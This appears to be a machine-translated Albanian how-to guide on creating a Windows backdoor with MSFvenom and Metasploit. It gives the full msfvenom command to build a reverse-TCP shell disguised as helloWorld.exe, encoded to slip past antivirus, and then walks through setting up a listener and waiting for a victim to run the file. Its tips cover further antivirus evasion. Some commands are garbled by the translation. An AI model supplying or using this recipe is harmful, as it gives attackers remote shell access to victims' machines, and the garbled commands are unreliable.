Një derë e pasme përdoret për të anashkaluar mekanizmat e sigurisë, shpesh në mënyrë të fshehtë dhe kryesisht të padukshme. Duke përdorur MSFvenom, kombinimi i msfpayload dhe msfencode, është e mundur të krijoni një derë të pasme që lidhet përsëri me sulmuesin duke përdorur TCP shell të kundërt. Për të zhvilluar një derë të pasme, duhet të ndryshoni nënshkrimin e malware tuaj për të shmangur çdo softver antivirus. Përfundoni këtë projekt në një palë kompjuterash në të cilët keni leje për të hyrë, dhe në proces, do të mësoni më shumë rreth sigurisë së kompjuterit dhe si funksionon ky lloj prapaskenash.
Hapa
Hapi 1. Nisni Kali dhe ndizni tastierën e Terminalit
Hapi 2. Shkruani ifconfig për të shfaqur ndërfaqen dhe kontrolloni adresën tuaj IP
Hapi 3. Shkruani koduesit msfvenom -l për të treguar listën e kodifikuesve
Ju do të përdorni x86/shikata_ga_nai si kodues
Hapi 4. Shkruani "msfvenom -a x86 -platforma windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -dritaret e platformës përcaktojnë arkitekturën për t'u përdorur.
- -p windows/shell/reverse_tcp përcakton ngarkesat e ngarkesës për t'u futur.
- LHOST cakton adresën IP të dëgjuesit.
- LPORT përcakton portën e dëgjuesit.
- -b "\ x00" përcakton për të shmangur karakterin e keq (bytes null).
- -e x86/shikata_ga_nai cakton emrin e koduesit.
- -f exe> helloWorld.exe përcakton daljen e formatit.
Hapi 5. Shkruani msfconsole për të aktivizuar Metasploit
Tani ju keni krijuar derën tuaj të pasme. Kur viktima klikon në helloWorld.exe, ngarkesa e guaskës që është ngulitur do të aktivizohet dhe do të bëjë një lidhje përsëri me sistemin tuaj. Për të marrë lidhjen, duhet të hapni menaxherin e shumëfishtë në Metasploit dhe të vendosni ngarkesat
Hapi 6. Shkruani use use/multi/handler
Hapi 7. Shtypni set payload windows/shell/reverse_tcp
Hapi 8. Shkruani opsionet e shfaqjes për të kontrolluar modulin
Hapi 9. Vendosni grupin LHOST 192.168.48.129
"LHOST" përcakton adresën IP të dëgjuesit
Hapi 10. Vendosni grupin LPORT 4444
"LPORT" përcakton portën e dëgjuesit
Hapi 11. Shkruani run dhe prisni lidhjen nga makina e viktimës
Hapi 12. Prisni që viktima të klikojë në helloWorld.exe
Atëherë do të lidheni me sukses me makinën e viktimës.
Këshilla
- Përdorimi i -i në MSFvenom do të përfaqësojë përsëritjet e kodimit. Ndonjëherë më shumë përsëritje mund të ndihmojnë për të shmangur softuerin AV.
- Ju keni mësuar se si të krijoni derën e pasme dhe të koduar duke përdorur MSFvenom, por kjo metodë nuk do të funksionojë në mënyrë perfekte kundër disa prej programeve AV në ditët e sotme. Arsyeja pas kësaj është për shkak të modeleve të ekzekutimit në MSFvenom. Shitësit AV kanë shtuar nënshkrimin statik të këtyre modeleve dhe thjesht i kërkojnë ato. Zgjidhja për këtë çështje është të përdorni një model ekzekutimi të ndryshëm ose mjete të ndryshme.